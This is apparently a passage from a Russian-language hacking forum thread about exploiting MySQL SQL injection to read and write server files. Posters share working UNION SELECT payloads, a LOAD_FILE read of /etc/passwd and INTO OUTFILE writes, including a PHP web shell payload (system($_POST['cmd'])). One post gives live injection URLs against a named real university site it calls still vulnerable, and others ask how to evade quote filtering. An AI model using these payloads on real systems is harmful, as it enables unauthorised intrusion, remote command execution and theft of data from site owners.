На видио вы ничего особенного не увидете, если не поняли смысл того что написано, то и видио смотреть бессмысленно, имхо
у меня проблема с чтением файла делаю вот так PHP: DROP TABLE IF EXISTS s; CREATE TABLE `s` (`script` TEXT NOT NULL); LOAD DATA LOCAL INFILE "/home/www/db_settings.php" INTO TABLE s; SELECT * FROM s на выводе всё что в файле идет внутри знаков {*} и array("*") пропустилось
Небольшое дополнение к статье Бывает что у юзера от которого работает скрипт есть file_priv, но мы не можем узнать локальный путь до сайта, ну или не знаем папки на сайте. Если при возникновении неправильного запроса мы видим полное описание ошибки, то это может помочь нам в загрузке файла на сервер, т.к. мускул при попытке создать файл выводит номера ошибок Unix-подобных систем. т.е предположим мы хотим создать файл в каталоге root что нам в 99.99% случаях не получится, тогда MySQL выдаст нам нечто подобное Can't create/write to file '/root/xek.txt' (Errcode: 13) Ошибка с кодом 13 означает Permission Denied При попытке создать уже имеющийся файл: Can't create/write to file '/etc/passwd' (Errcode: 17) File already exists и при попытке создать файл в несуществующей директории: Can't create/write to file '/xek/nepoxek/123.txt' (Errcode: 2) No such file or directory Т.е благодаря простому перебору мы можем найти локальный путь к сайту, хотя это очень геморно и конечно не даёт 100% гарантии его нахождения Повторюсь что данные ошибки появляются не всегда =\
угу, я тоже замечал что то наподобие, я это написал в пояснении к видео по взлому, но видео так и не выложил, т.к. понял что в видео ничего суперпотрясающего нет... вот цитата из пояснения: С FreeBSD дела обстаят проще... вот здесь про это можно прочитать: http://forum.antichat.ru/thread55237.html
Mysql в шестой ветке всерьез задумались поддержать именитую x-технологий xml и дать нам еще одну возможность для подрузки файла - новая функция под названием LOAD XML.Насчет ограничений обрамления файла ковычками не знаю но на сайте mysql написано что имя файла должно быть заключено в ковычки. Файл должен быть примерно в таком виде.Поставим - увидим , что получится ... http://dev.mysql.com/doc/refman/6.0/en/load-xml.html
У меня вопрос, вот пример есть сайт но там стоит фильтр на кавычки. Я могу читать файлы только через SQL HEX такой если я пример зашифрую /tmp/shell.php - без ковычик в SQL HEX <?php system($_POST['cmd']);?> - SQL HEX и у меня получится так: http://site.com/index.php?id=-1+union+select+1,2,тут зашифрованный шелл в SQL HEX,4,5,6+from+user+into+outfile+а тут зашифрованный /tmp/shell.php в SQL HEX (0x746d702f7368656c6c2e706870)/* Это команда выполнится? То есть если у меня хватает прав на запись, то разницы нету в в SQL HEX я передаю или нет?
Уже говорилось на форуме, что в структуре SELECT...INTO OUTFILE наличие from table не является обязательным. Если не изменяет память, то from table требовалось в мускуле третьей версии Эта команда не выполнится, если стоит фильтр на кавычки, ибо мускуль после INTO OUTFILE ждет строку, заключенную или в одинарные, или в двойные кавычки. Всякие sql-hex, char() и остальное работать не будет
Ни одна из ссылок в первом посте на "жертву" не работает. А сам сайт соществует и по сей день, и остался таким же дырявым.) Вот пару ссылок, кому интерестно: HTML: http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4/* USER:1dsl1bmcn@localhost VERSION:5.0.32-Debian_7etch5-log DATABASE:research HTML: http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,table_name,3,4+from+information_schema.tables+limit+17,10/* - вывод названий таблиц Теперь скрипт фильтрует ковычки, но переводом в char фильтрацию можно обойти. Сделать это по прежнему можно на упомянутом в самой статье сайте HTML: http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,LOAD_FILE(0x2f6574632f706173737764),3,4/* - читаем /etc/passwd
помогите тож с скуль иньектом проблема что фильтруются запрос sportID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,CHAR(39,60,115,99,114,105,112,116,62,97,108,101,114,116,40,50,49,51,41,32,60,47,115,99,114,105,112,116,62,39),20+from+t_sports+order+by+level+into+outfile+'/tmp/1.txt'/* Так как путь указан с кавычками то выпрыгивает ерор: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/1.txt''/* ORDER BY Level' at line 1 Как обойти фильтрацию?
Статья хорошая. Плохо, что не написано при каких условиях возможно залить файл: то есть не написано, что надо, чтобы мы могли читать файлы, чтобы не фильтровалась ковычка, чтобы хватило прав на запись А так очень хорошо! Молодец!
